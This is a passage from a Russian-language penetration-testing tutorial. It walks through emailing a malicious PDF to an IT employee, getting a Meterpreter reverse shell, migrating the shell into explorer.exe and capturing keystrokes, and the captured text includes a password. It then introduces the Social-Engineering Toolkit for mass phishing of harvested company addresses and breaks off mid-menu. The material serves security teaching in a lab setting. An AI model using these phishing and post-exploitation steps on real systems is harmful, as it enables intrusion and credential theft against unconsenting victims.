Как мы видим , сценарий позволяет нам задать любой адрес отправителя (-f), адрес назначения(-t) , SMTP сервер (-s) , заголовок письма(-u) и наши вложения (-а ). Когда вы задали опции скрипта, нажмите клавишу ВВОД, введите любое сообщение, затем нажмите Ctrl + D, письмо отправится жертве.
На машине жертвы, работник ИТ отдела, заходит в систему, проверяет почту.
Получив важное письмо, работник копирует документ на рабочий стол, чтобы проверить файл антивирусной программой.

scanning

Как мы видим, наш файл с честью прошел проверку антивируса. Сотрудник ИТ отдела открывает файл, чтобы получить важные указания по обновлению ПО. Щелчок по файлу запускает программу Adobe, но вместо документа взору предстает серое окно программы.
Тем временем на машине нападающего....

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Sending stage (718336 bytes)
session[*] Meterpreter session 1 opened (192.168.8.128:4455 -> 192.168.8.130:49322)
 
meterpreter >

Теперь у атакующего есть shell на целевой системе,за счет вредоносного PDF и атаке на стороне клиента. Будет мудрым закрепиться в системе, прикрепив shell к другому процессу, чтобы когда процесс Adobe «умрет», мы не потеряли shell. После изучения системной информации запустим клавиатурный шпион и продолжим эксплуатацию сети.

meterpreter > ps
 
Process list
============
 
    PID   Name            Path                                  
    ---   ----            ----                                  
    852   taskeng.exe     C:\Windows\system32\taskeng.exe       
    1308  Dwm.exe         C:\Windows\system32\Dwm.exe           
    1520  explorer.exe    C:\Windows\explorer.exe               
    2184  VMwareTray.exe  C:\Program Files\VMware\VMware Tools\VMwareTray.exe
    2196  VMwareUser.exe  C:\Program FilesVMware\VMware Tools\VMwareUser.exe
    3176  iexplore.exe    C:\Program Files\Internet Explorer\iexplore.exe
    3452  AcroRd32.exe    C:\Program Files\AdobeReader 8.0\ReaderAcroRd32.exe
 
meterpreter > migrate 1520
[*] Migrating to 1520...
[*] Migration completed successfully.
 
meterpreter > sysinfo
Computer: OFFSEC-PC
OS      : Windows Vista (Build 6000, ).
 
meterpreter > use priv
Loading extension priv...success.
 
meterpreter > keyscan_start
Starting the keystroke sniffer...
 
meterpreter > keyscan_stop
Stopping the keystroke sniffer...
 
meterpreter > keyscan_dump
Dumping captured keystrokes...
 
Support,   I tried to open ti his file 2-3 times with no success.  I even had my admin and CFO tru   y it, but no one can get it to p open.  I turned on the rmote access server so you can log in to fix our p         this problem.  Our user name is admin and password for that session is 123456.   Call or eme ail when you are done.   Thanks IT Dept 
meterpreter >

Конец игры.

Инструменты социальной инженерии.

Social-Engineering Toolkit (SET) был разработан Дэвидом Кеннеди (ReL1K) и включает в одном простом интерфейсе множество атак основанных на социальной инженерии. Основной целью набора SET является автоматизация и улучшение атак социальной инженерии. Вы можете скачать Social-Engineering Toolkit через subversion просто набрав в Back|Track 4:

svn co http://svn.thepentest.com/social_engineering_toolkit/ SET/

Хорошо, что с текущей версией SET не требуется никаких внешних модулей Python, так что все, что вам нужно сделать, чтобы запустить toolkit является:

root@bt4:/home/relik# cd SET/
root@ssdavebt4:/home/relik/SET# ./set
 
 
    [---]       The Social Engineering Toolkit (SET)     [---]
    [---] Written by David Kennedy (ReL1K) @ SecureState [---]
    [---]               Version: 0.1 Alpha               [---]
 
Welcome to the Social Engineering Toolkit, your one-stop shop
for all of your social engineering needs.
 
Select from the menu on what you would like to do:
 
1. Automatic E-Mail Attacks
2. Website Attacks
3. Update the Metasploit Framework
4. Help
5. Exit the Toolkit
 
Enter your choice:

Заметим, что альфа-версия разработана и выпущена Social-Engineering Framework (http://www.social-engineer.org). Если вы заметили, общий формат вывода SET очень похож на интерактивное меню Fast-Track.
Сценарий 1
Допустим каким то образом, например через поисковик google вы смогли добыть около 30 e-mail адресов компании. Вы можете разослать всем адресатам письма с прикрепленным файлом в надежде на то, что кто-то из них откроет вложение и вы получите доступ к системе.
Первое, что вам нужно сделать, это создать список адресов электронной почты в формате представленном ниже:

bob@example.com
joe@example.com
jane@example.com
josh@example.com

После создания списка адресов, запустите SET, создайте полезную нагрузку для подключения к вам и будьте готовы к принять соединения с удаленных систем.

root@bt4:/home/relik/SET# ./set
 
 
    [---]       The Social Engineering Toolkit (SET)     [---]
    [---] Written by David Kennedy (ReL1K) @ SecureState [---]
    [---]               Version: 0.1 Alpha               [---]
 
Welcome to the Social Engineering Toolkit, your one-stop shop
for all of your social engineering needs.
 
Select from the menu on what you would like to do:
 
1. Automatic E-Mail Attacks
2. Website Attacks
3. Update the Metasploit Framework
4. Help
5. Exit the Toolkit
 
Enter your choice: 1
 
 
    [---]       The Social Engineering Toolkit (SET)     [---]
    [---] Written by David Kennedy (ReL1K) @ SecureState [---]
  [---]               Version: 0.1 Alpha                [---]
    [---]           E-Mail Attacks Menu                  [---]
 
This menu will automate file-format email attacks for you. You will